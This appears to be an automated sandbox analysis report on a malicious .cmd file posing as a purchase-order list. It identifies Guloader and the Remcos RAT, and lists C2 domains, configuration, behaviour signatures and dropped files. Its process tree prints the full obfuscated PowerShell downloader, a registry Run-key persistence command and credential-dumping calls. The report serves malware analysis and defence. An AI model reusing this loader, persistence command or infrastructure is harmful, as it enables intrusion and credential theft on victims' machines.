Overview

overview

10

Static

static

1

rfq_final_...24.cmd

windows7-x64

10

rfq_final_...24.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-09-2024 01:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmd

  • Size

    6KB

  • MD5

    f7ba2a252aad41953101bc4032d650ee

  • SHA1

    9647596c54892c99981179267b193da9643aa839

  • SHA256

    842c000429c7e5787fb9fd0961238758e04b4af6c6b56dc4bb0c4db27af69fce

  • SHA512

    1a33c465faa62a5397eab362912967b25604cb8320e2ec5faf44374bc161d054b1e0e217100fbdea331b9114e4221e689531b46fd7b435020a7af43d28a98682

  • SSDEEP

    192:VQW8A6936logZZQlXtVaEGmpQnYHZYya0wb7:6E6pGZ59mOnYfaXb7

Score
10/10
guloaderremcosbundle$$collectioncredential_accessdiscoverydownloaderexecutionpersistenceratstealer

Malware Config

Extracted

Family

remcos

Botnet

Bundle$$

C2

iwarsut775laudrye2.duckdns.org:57484

iwarsut775laudrye2.duckdns.org:57483

iwarsut775laudrye3.duckdns.org:57484

hjnourt38haoust1.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    sfvnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shietgtst-RX5FWO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Ledning='Forureningsfri';$modernises=${host}.Runspace;If ($modernises) {$Livmoderne++;$Ledning+='suppliancies';$Unregenerative='su';$Ledning+='Mmede105';$Unregenerative+='bs';$Ledning+='Rosewoods';$Unregenerative+='tri';$Ledning+='Fjeld';$Unregenerative+='ng';};Function Endgate($Udlovnings){$Speers=$Udlovnings.Length-$Livmoderne;For( $Fremsaette=4;$Fremsaette -lt $Speers;$Fremsaette+=5){$Albuminerne+=$Udlovnings.$Unregenerative.'Invoke'( $Fremsaette, $Livmoderne);}$Albuminerne;}function Plumbagos($Permissionen){ . ($Boost) ($Permissionen);}$Calciphobic=Endgate ' .plM NeooSvovzD sriUncrlBem.l.ibeaStov/Hnge5Logn.Bemy0blod T.an(MillWServiPseunNdbrdRepao A.aw Ukls Amp ImpeN FedT Fed Go f1Ol.o0dege.Trav0 Fin;Avou DeesWHypeiEmisnAfsp6 om4Fakt;sir. K lexEul 6 R,l4V df; Pub Regur .orvVers:S,as1Etn,2,efr1Syds. Re 0 fpl)Genu BactGcoheeDemicApprk HydoNysk/Om h2 Mm 0Junk1 Res0L ge0Seyc1Stim0Besl1Dogm SoleFCopei AmirF useCorrfMikroInf.xFert/Ungl1 Int2Ant,1Over. Vin0Ska ';$Horsefeathers5=Endgate 'KiddUTilvsArm eIlanr.sia-RerrA Be.geu oeNglenImp,t Roa ';$Hypersphere=Endgate 'Su,eh Ovet Hngt KlopAntisldr,:Bord/Udlo/Genbn.orloTe,et,akka CenrEn siOpl,u alvsLakfnNecraNa eyAtcodLovfe natn outo fodvKooraAero.StraeC.ncu So,/SurhwEinkpProg-Sja,aIndfdR.jemFun,iTypen Pil/MammuBegysSkake idirtenasry s/ ,ahSRivetPro.eAptev EkseFrugtsubcsProb.Deduc RecsDds.v ugg>Arbeh Subt tortOrcapMonasFaku: St./Sele/profjPortrvomieOratxP otpTarirDe eeglumsskresUpcufH rorSanie saciFensgsnu.h ShitKrig.P owcInfroMilimSnre/Fin wParapNaer- haraResud,afemDis iConsn.isk/PudeuSeissTinte NeorMak,sDysl/ CheS Ralt,eleeInfivAntielengtChals De .ScricOvers,llov aer ';$Pouncing=Endgate 'Logi>Udfl ';$Boost=Endgate 'SmatiDo peHomoxBar ';$Fremsaettedeomania='programudviklingen';$Tienkou = Endgate ' O.seEvnecSt,ah MiloAmt, O ph%Oms a ,tepOpl.p VaadDe aa atatboi,aUrte%Nata\EmbrSJubeu TenpEdi.eOpkorSpaldfel.yTolviOprenPreegSqua. I.cSD stuS bvtHelt U su& San& R,i AdveeVarmcMetahEnpuoChou FluetMini ';Plumbagos (Endgate 'Over$ Livg ejflUdluo,ogmbNi.ka Strl Omr:H svMTankoTodiaTr,krPolyiCal,aStopnMaks=,ome(EftecSamsmLevidEn,l ua v/CalicFeat Mixb$MaleT lani,ommeHo snBandkHa soKogauKreb)Husv ');Plumbagos (Endgate 'Cons$Vi agP ill onoBystbSta aDipnlWaen:InspMHypeiPurgnCitreSirerRadiaP.cclVotevFre.aJellnJackd PlusHepaf phiaedifbOutwr Pe,iEnvokAlmekElsaePodon obl=Re e$Fle HMiscyDiglpSemieMonor SujsJu,epUm,ehRecoeOu.prL.noeBere.,akks .hep.euclSlaaiNogetTrde(Skat$AquaPProgoor kuGlasnFeroc I,fiOvernHjemgPaab)Hemi ');Plumbagos (Endgate 'Kamp[TrooN AnoeBergtSaml.StraS LovePhytr M lv F ciHu,bc TuseTidtP.ageoJoyliTri,n MnstBiscMFolkaGrupnAl,maDeargbitre In,rfor,]Prog: Epi:AstrS Yase,tvncCar.uTuderCodeiR.setUnexyBugsPDiasrKommoRelat,kito.irecStemoPtomlClad Ball=beli Ridd[SpecN.nfae.rectapo .SvagSD.stesh.kcSquiuAfter Fo,iI.extExpryLasePS gnrLithosy,ctForsoGruncbackoCivilLakeT.artyAl,epVelkeGaen] Fug:Deta:SlamT HuslBuens tra1Alie2Pend ');$Hypersphere=$Mineralvandsfabrikken[0];$Stiftelsesfesternes= (Endgate 'Batc$TinggSezelB,rdoJol,bflydaRegel.dap:Un,uUcoilnArgutUnshaEncosHirtt.ppeePigef E,su Regl Pl =c.coNTaleeHalvw .ee-TrocO Eryb aanj arie.ugncDesetBegr VisiSHan yHilmsTerbtSteneDiskmpa.a. F.rNForseT lbt phi. .inW Fine,ndlbEndeCvarmlMilli AgreUnden Indt');$Stiftelsesfesternes+=$Moarian[1];Plumbagos ($Stiftelsesfesternes);Plumbagos (Endgate 'Tilr$WearUC ttnKiltt,echa QuasD,nktAut eWo,dfRadiuAf.rl Mir.ax,aHBitreSortaSodadPerfePortrmugesL st[Svup$ LysHDiopoFu.kr H gs mbueTidsfCandeMetaa St tGenkhAnspeRederStans Dri5.ids]Arbe=Tide$NedsCOve,a TillSacic empiAnaepDazih I ooNvnsbSkkeiFilmc dko ');$Seamier75=Endgate 'Temp$ TwyUHyp,nSilkt remamawksAnvetMoo.eBaadfPelau KlflPro .NonsDCarboKe.lwIndun sovlT kvo TyeaDrosdSpisFTandiEncolU ree Rad(Stet$KrusH N.ky .rup B.aeNa orSe,ssBl,op,dtrh B.ieBumpr,holeT,sm,vink$AnvzScu.vkBlikuS eprTit.e .ivd,osteTrim)sjlf ';$Skurede=$Moarian[0];Plumbagos (Endgate ' Er,$Cut,gS rilPenso Augb Kn aNonvlBeig: DelVCompibasnk KontSym u.ejla.urzl In,iteore H.avN.nei UudrT,lsk DissCe eoFullmTrash Fe e HetdUp.aeGldsr .vesS uk=spar(GenkTMerre,erosArtet Byp-Pat.P Paua Sekts.ruh or Reub$SpydSExcekBerbuUdvir H.neAfgrdM.moeWatt) Sp, ');while (!$Viktualievirksomheders) {Plumbagos (Endgate 'Nona$LandgHenslE doo ostb.andaFluolMyct: PriLVrdiy Hi d egnbTolelIntegBaadePedi=Fi e$FraatLy tr,aaduConveBurd ') ;Plumbagos $Seamier75;Plumbagos (Endgate 'UnreS MirtConsasm.erD,kut Lib- AutSResulPorne LepeSlutpTone Smi 4Albu ');Plumbagos (Endgate 'U,co$Pockg Fj lForto.runbTailaGudblTe.r: TonVAntiiBathkCruet,rovujttea H,rlEleviH lleOutbvPareiTe,dr E.ekdog.sPartoRegem Pythph.ce ppld.igaeOverrOversElio=Bede(Y,rdT EpieUnexsPhottSner-invaPalliaHuactStaghNoma Snb$S,riSSa,kkQuicu gnerUnaceIs,adFr ne Tet)Stad ') ;Plumbagos (Endgate ' Foo$Baetg GinlEksponyhebBas a H.alFde,: FacBpresrHaywuasy,dGanosOmfoi FrekZe,or PsyeArv,sSko t CooeTin.sUnas=,omb$,rddgKultlOdoro Hypb U.pa ,aslPolo:DaciO.embvMakkeKlodrTeknpConcrUn.eoPropnDivioReleuHeadnJernc .raeGeocdTurb+Feli+Fort% Dec$F,akMProti DadnKinoePrecr ,leaExpalSammvImdeaF,sin,nfad.rchs,ntifKlagaOverbKostrDaiji KemkPhotkSunseSardnAlko.UdracVildoPassuMil,nPatrtFemt ') ;$Hypersphere=$Mineralvandsfabrikken[$Brudsikrestes];}$Untasselled=338696;$Babysitterens=28100;Plumbagos (Endgate 'Peri$Sp rgQuarlLn ooUn,fbElecaNivelFje :P,ktIY ris Ac.oamylg KemeEco,n ateoF,gltdepuyMo ip D,tetilf T.av=agon ettGHougeOr kt .po-.fstCSindoGon,nOp.ht.utleFlacnGodktPill Hal$BredSPhytkQ.aduDandrDekaeTrind audeEn,u ');Plumbagos (Endgate 'Bra,$KroegTi.elJamboS.nabS.ova.llelFisk:Hy,rKMariuS amlTethl FejaSprggVa,erNon.e Ark Tor =Ki,e La,t[,itiS O.jy UppsIntrtFo.ee ronmTrig.Sno,CHe moprotn iopvBurseUna,rMatctFers]Srtr: S u:LeucFSc.rrAfviot,knmSy eBE,izaAsi sDiese,dsp6 ,it4outpSMummtMasdrstaviG,nbnGldegSter(Tusi$TusiI Miss,iamoP.tigPrepeNod.n piro Cant,ngly,njopDy eeVgge)Sknd ');Plumbagos (Endgate 'Test$C.mmgI.dslfen.oIndsbFlaaaudlblRee :NewsN,ongoSub.nTje,e conr .ulrDinkoElfonA rveLavnoSkatu Tu,sDannl WeeyTr.m Bill=Ad l Ove[ ,etSHistyJomfsSammtTaxieOv.rm Spa.MockTGewgeUna,xSpidt Pot.,andE IllnmulccVideoKritdSt,giFac,nBubbgForb]Fuco: Ant:dimiAFabrSVansCDetaI.rebIRelo.KontGFdeeeExtrtBourSArcht Pe.rUnliiMa.en Prog.tik( Yai$NedtKVerduJacklforhl,venaS.rigMeror Emae lap)Vand ');Plumbagos (Endgate 'Exc.$RevegSjuslGrizo Ri,b MeraStopl D g: Di BSammeTvans HvaoSponvTil e,auknFir.d Gene Gat=Reve$SynsNS reo ,epn TraeMi srRet.rEroboEnyanForbeConfoRamlu.acosBulnl AnayForl.GumbsJouruRakebInbrs,indtNarcrFo liRugenAffigTimo(Ex.t$ De U.ognnSifft.enoaTr,ks .ussPreseStoplMotilpseue.afkdUnco,Glad$ T.aB to aFan.bOveryAccesGly,i G.rtP.rrtUtureCon.rOvere EksnAutosFart) Mo ');Plumbagos $Besovende;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5056
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Superdying.Sut && echo t"
        3⤵
          PID:2136
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ledning='Forureningsfri';$modernises=${host}.Runspace;If ($modernises) {$Livmoderne++;$Ledning+='suppliancies';$Unregenerative='su';$Ledning+='Mmede105';$Unregenerative+='bs';$Ledning+='Rosewoods';$Unregenerative+='tri';$Ledning+='Fjeld';$Unregenerative+='ng';};Function Endgate($Udlovnings){$Speers=$Udlovnings.Length-$Livmoderne;For( $Fremsaette=4;$Fremsaette -lt $Speers;$Fremsaette+=5){$Albuminerne+=$Udlovnings.$Unregenerative.'Invoke'( $Fremsaette, $Livmoderne);}$Albuminerne;}function Plumbagos($Permissionen){ . ($Boost) ($Permissionen);}$Calciphobic=Endgate ' .plM NeooSvovzD sriUncrlBem.l.ibeaStov/Hnge5Logn.Bemy0blod T.an(MillWServiPseunNdbrdRepao A.aw Ukls Amp ImpeN FedT Fed Go f1Ol.o0dege.Trav0 Fin;Avou DeesWHypeiEmisnAfsp6 om4Fakt;sir. K lexEul 6 R,l4V df; Pub Regur .orvVers:S,as1Etn,2,efr1Syds. Re 0 fpl)Genu BactGcoheeDemicApprk HydoNysk/Om h2 Mm 0Junk1 Res0L ge0Seyc1Stim0Besl1Dogm SoleFCopei AmirF useCorrfMikroInf.xFert/Ungl1 Int2Ant,1Over. Vin0Ska ';$Horsefeathers5=Endgate 'KiddUTilvsArm eIlanr.sia-RerrA Be.geu oeNglenImp,t Roa ';$Hypersphere=Endgate 'Su,eh Ovet Hngt KlopAntisldr,:Bord/Udlo/Genbn.orloTe,et,akka CenrEn siOpl,u alvsLakfnNecraNa eyAtcodLovfe natn outo fodvKooraAero.StraeC.ncu So,/SurhwEinkpProg-Sja,aIndfdR.jemFun,iTypen Pil/MammuBegysSkake idirtenasry s/ ,ahSRivetPro.eAptev EkseFrugtsubcsProb.Deduc RecsDds.v ugg>Arbeh Subt tortOrcapMonasFaku: St./Sele/profjPortrvomieOratxP otpTarirDe eeglumsskresUpcufH rorSanie saciFensgsnu.h ShitKrig.P owcInfroMilimSnre/Fin wParapNaer- haraResud,afemDis iConsn.isk/PudeuSeissTinte NeorMak,sDysl/ CheS Ralt,eleeInfivAntielengtChals De .ScricOvers,llov aer ';$Pouncing=Endgate 'Logi>Udfl ';$Boost=Endgate 'SmatiDo peHomoxBar ';$Fremsaettedeomania='programudviklingen';$Tienkou = Endgate ' O.seEvnecSt,ah MiloAmt, O ph%Oms a ,tepOpl.p VaadDe aa atatboi,aUrte%Nata\EmbrSJubeu TenpEdi.eOpkorSpaldfel.yTolviOprenPreegSqua. I.cSD stuS bvtHelt U su& San& R,i AdveeVarmcMetahEnpuoChou FluetMini ';Plumbagos (Endgate 'Over$ Livg ejflUdluo,ogmbNi.ka Strl Omr:H svMTankoTodiaTr,krPolyiCal,aStopnMaks=,ome(EftecSamsmLevidEn,l ua v/CalicFeat Mixb$MaleT lani,ommeHo snBandkHa soKogauKreb)Husv ');Plumbagos (Endgate 'Cons$Vi agP ill onoBystbSta aDipnlWaen:InspMHypeiPurgnCitreSirerRadiaP.cclVotevFre.aJellnJackd PlusHepaf phiaedifbOutwr Pe,iEnvokAlmekElsaePodon obl=Re e$Fle HMiscyDiglpSemieMonor SujsJu,epUm,ehRecoeOu.prL.noeBere.,akks .hep.euclSlaaiNogetTrde(Skat$AquaPProgoor kuGlasnFeroc I,fiOvernHjemgPaab)Hemi ');Plumbagos (Endgate 'Kamp[TrooN AnoeBergtSaml.StraS LovePhytr M lv F ciHu,bc TuseTidtP.ageoJoyliTri,n MnstBiscMFolkaGrupnAl,maDeargbitre In,rfor,]Prog: Epi:AstrS Yase,tvncCar.uTuderCodeiR.setUnexyBugsPDiasrKommoRelat,kito.irecStemoPtomlClad Ball=beli Ridd[SpecN.nfae.rectapo .SvagSD.stesh.kcSquiuAfter Fo,iI.extExpryLasePS gnrLithosy,ctForsoGruncbackoCivilLakeT.artyAl,epVelkeGaen] Fug:Deta:SlamT HuslBuens tra1Alie2Pend ');$Hypersphere=$Mineralvandsfabrikken[0];$Stiftelsesfesternes= (Endgate 'Batc$TinggSezelB,rdoJol,bflydaRegel.dap:Un,uUcoilnArgutUnshaEncosHirtt.ppeePigef E,su Regl Pl =c.coNTaleeHalvw .ee-TrocO Eryb aanj arie.ugncDesetBegr VisiSHan yHilmsTerbtSteneDiskmpa.a. F.rNForseT lbt phi. .inW Fine,ndlbEndeCvarmlMilli AgreUnden Indt');$Stiftelsesfesternes+=$Moarian[1];Plumbagos ($Stiftelsesfesternes);Plumbagos (Endgate 'Tilr$WearUC ttnKiltt,echa QuasD,nktAut eWo,dfRadiuAf.rl Mir.ax,aHBitreSortaSodadPerfePortrmugesL st[Svup$ LysHDiopoFu.kr H gs mbueTidsfCandeMetaa St tGenkhAnspeRederStans Dri5.ids]Arbe=Tide$NedsCOve,a TillSacic empiAnaepDazih I ooNvnsbSkkeiFilmc dko ');$Seamier75=Endgate 'Temp$ TwyUHyp,nSilkt remamawksAnvetMoo.eBaadfPelau KlflPro .NonsDCarboKe.lwIndun sovlT kvo TyeaDrosdSpisFTandiEncolU ree Rad(Stet$KrusH N.ky .rup B.aeNa orSe,ssBl,op,dtrh B.ieBumpr,holeT,sm,vink$AnvzScu.vkBlikuS eprTit.e .ivd,osteTrim)sjlf ';$Skurede=$Moarian[0];Plumbagos (Endgate ' Er,$Cut,gS rilPenso Augb Kn aNonvlBeig: DelVCompibasnk KontSym u.ejla.urzl In,iteore H.avN.nei UudrT,lsk DissCe eoFullmTrash Fe e HetdUp.aeGldsr .vesS uk=spar(GenkTMerre,erosArtet Byp-Pat.P Paua Sekts.ruh or Reub$SpydSExcekBerbuUdvir H.neAfgrdM.moeWatt) Sp, ');while (!$Viktualievirksomheders) {Plumbagos (Endgate 'Nona$LandgHenslE doo ostb.andaFluolMyct: PriLVrdiy Hi d egnbTolelIntegBaadePedi=Fi e$FraatLy tr,aaduConveBurd ') ;Plumbagos $Seamier75;Plumbagos (Endgate 'UnreS MirtConsasm.erD,kut Lib- AutSResulPorne LepeSlutpTone Smi 4Albu ');Plumbagos (Endgate 'U,co$Pockg Fj lForto.runbTailaGudblTe.r: TonVAntiiBathkCruet,rovujttea H,rlEleviH lleOutbvPareiTe,dr E.ekdog.sPartoRegem Pythph.ce ppld.igaeOverrOversElio=Bede(Y,rdT EpieUnexsPhottSner-invaPalliaHuactStaghNoma Snb$S,riSSa,kkQuicu gnerUnaceIs,adFr ne Tet)Stad ') ;Plumbagos (Endgate ' Foo$Baetg GinlEksponyhebBas a H.alFde,: FacBpresrHaywuasy,dGanosOmfoi FrekZe,or PsyeArv,sSko t CooeTin.sUnas=,omb$,rddgKultlOdoro Hypb U.pa ,aslPolo:DaciO.embvMakkeKlodrTeknpConcrUn.eoPropnDivioReleuHeadnJernc .raeGeocdTurb+Feli+Fort% Dec$F,akMProti DadnKinoePrecr ,leaExpalSammvImdeaF,sin,nfad.rchs,ntifKlagaOverbKostrDaiji KemkPhotkSunseSardnAlko.UdracVildoPassuMil,nPatrtFemt ') ;$Hypersphere=$Mineralvandsfabrikken[$Brudsikrestes];}$Untasselled=338696;$Babysitterens=28100;Plumbagos (Endgate 'Peri$Sp rgQuarlLn ooUn,fbElecaNivelFje :P,ktIY ris Ac.oamylg KemeEco,n ateoF,gltdepuyMo ip D,tetilf T.av=agon ettGHougeOr kt .po-.fstCSindoGon,nOp.ht.utleFlacnGodktPill Hal$BredSPhytkQ.aduDandrDekaeTrind audeEn,u ');Plumbagos (Endgate 'Bra,$KroegTi.elJamboS.nabS.ova.llelFisk:Hy,rKMariuS amlTethl FejaSprggVa,erNon.e Ark Tor =Ki,e La,t[,itiS O.jy UppsIntrtFo.ee ronmTrig.Sno,CHe moprotn iopvBurseUna,rMatctFers]Srtr: S u:LeucFSc.rrAfviot,knmSy eBE,izaAsi sDiese,dsp6 ,it4outpSMummtMasdrstaviG,nbnGldegSter(Tusi$TusiI Miss,iamoP.tigPrepeNod.n piro Cant,ngly,njopDy eeVgge)Sknd ');Plumbagos (Endgate 'Test$C.mmgI.dslfen.oIndsbFlaaaudlblRee :NewsN,ongoSub.nTje,e conr .ulrDinkoElfonA rveLavnoSkatu Tu,sDannl WeeyTr.m Bill=Ad l Ove[ ,etSHistyJomfsSammtTaxieOv.rm Spa.MockTGewgeUna,xSpidt Pot.,andE IllnmulccVideoKritdSt,giFac,nBubbgForb]Fuco: Ant:dimiAFabrSVansCDetaI.rebIRelo.KontGFdeeeExtrtBourSArcht Pe.rUnliiMa.en Prog.tik( Yai$NedtKVerduJacklforhl,venaS.rigMeror Emae lap)Vand ');Plumbagos (Endgate 'Exc.$RevegSjuslGrizo Ri,b MeraStopl D g: Di BSammeTvans HvaoSponvTil e,auknFir.d Gene Gat=Reve$SynsNS reo ,epn TraeMi srRet.rEroboEnyanForbeConfoRamlu.acosBulnl AnayForl.GumbsJouruRakebInbrs,indtNarcrFo liRugenAffigTimo(Ex.t$ De U.ognnSifft.enoaTr,ks .ussPreseStoplMotilpseue.afkdUnco,Glad$ T.aB to aFan.bOveryAccesGly,i G.rtP.rrtUtureCon.rOvere EksnAutosFart) Mo ');Plumbagos $Besovende;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3268
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Superdying.Sut && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2412
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1468
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Adspreder" /t REG_EXPAND_SZ /d "%Hydropsy% -w 1 $Disulphoxide=(Get-ItemProperty -Path 'HKCU:\Outputtet\').Restorative;%Hydropsy% ($Disulphoxide)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4256
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Adspreder" /t REG_EXPAND_SZ /d "%Hydropsy% -w 1 $Disulphoxide=(Get-ItemProperty -Path 'HKCU:\Outputtet\').Restorative;%Hydropsy% ($Disulphoxide)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:508
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kiwjtvuokxyqejzvuvcvrmzjhezgdxj"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3688
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vkkcunfqgfqdoxnzlgpwurmaqlqhwiitot"
              5⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:4576
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xfpmug"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4500

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wuc5byo.r20.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\kiwjtvuokxyqejzvuvcvrmzjhezgdxj
      Filesize

      4KB

      MD5

      18db1829b27eaeed163c211f5d179d72

      SHA1

      4442332494cba1e012f8876ecac42126ba995bc6

      SHA256

      610c5ee3f0e63441521d26bc477c9618a4c5f86e93d31b31890680c69e3ecc3d

      SHA512

      123d68b2c84f7a52d15faa212c06f33b04a55585e2aeb16bb14df95b18c0bcf31933e5bf0c736c90bc054b9527fccb046540d3302a0f149ebeed7c6bcca0b986

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Superdying.Sut
      Filesize

      477KB

      MD5

      f86cf96350847ef06a870ce588bb94d1

      SHA1

      3df50292fbe1f11c77349ad7e208bc55b7ef0d9d

      SHA256

      f81623ea997e763d23e9f0a91ab6ec679d5cebe77e67b1283319725f5fc5ebe9

      SHA512

      3f123baef2e58adb8333039bfeb2704877d413f42bec247c0afe396db95497b32378b6126543d9383ac32f447de4ce36e97f7a512472732f944083fc1cb3b055

      Download Submit

    • memory/1468-82-0x0000000022140000-0x0000000022159000-memory.dmp

      Filesize

      100KB

      Download

    • memory/1468-83-0x0000000022140000-0x0000000022159000-memory.dmp

      Filesize

      100KB

      Download

    • memory/1468-79-0x0000000022140000-0x0000000022159000-memory.dmp

      Filesize

      100KB

      Download

    • memory/1468-56-0x0000000000E40000-0x0000000006094000-memory.dmp

      Filesize

      82.3MB

      Download

    • memory/1468-55-0x0000000000400000-0x00000000005E4000-memory.dmp

      Filesize

      1.9MB

      Download

    • memory/3268-41-0x0000000007890000-0x00000000078B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3268-46-0x00000000744B0000-0x0000000074C60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3268-22-0x00000000744B0000-0x0000000074C60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3268-23-0x00000000057C0000-0x00000000057E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3268-24-0x0000000005860000-0x00000000058C6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3268-25-0x0000000005F40000-0x0000000005FA6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3268-35-0x0000000006030000-0x0000000006384000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3268-36-0x0000000006660000-0x000000000667E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3268-37-0x0000000006680000-0x00000000066CC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3268-38-0x0000000007FF0000-0x000000000866A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3268-39-0x0000000006C00000-0x0000000006C1A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3268-40-0x0000000007970000-0x0000000007A06000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3268-17-0x00000000744BE000-0x00000000744BF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3268-42-0x0000000008670000-0x0000000008C14000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3268-57-0x00000000744B0000-0x0000000074C60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3268-44-0x0000000008C20000-0x000000000DE74000-memory.dmp

      Filesize

      82.3MB

      Download

    • memory/3268-45-0x00000000744BE000-0x00000000744BF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3268-21-0x0000000005910000-0x0000000005F38000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3268-19-0x0000000002DD0000-0x0000000002E06000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3688-73-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/3688-64-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

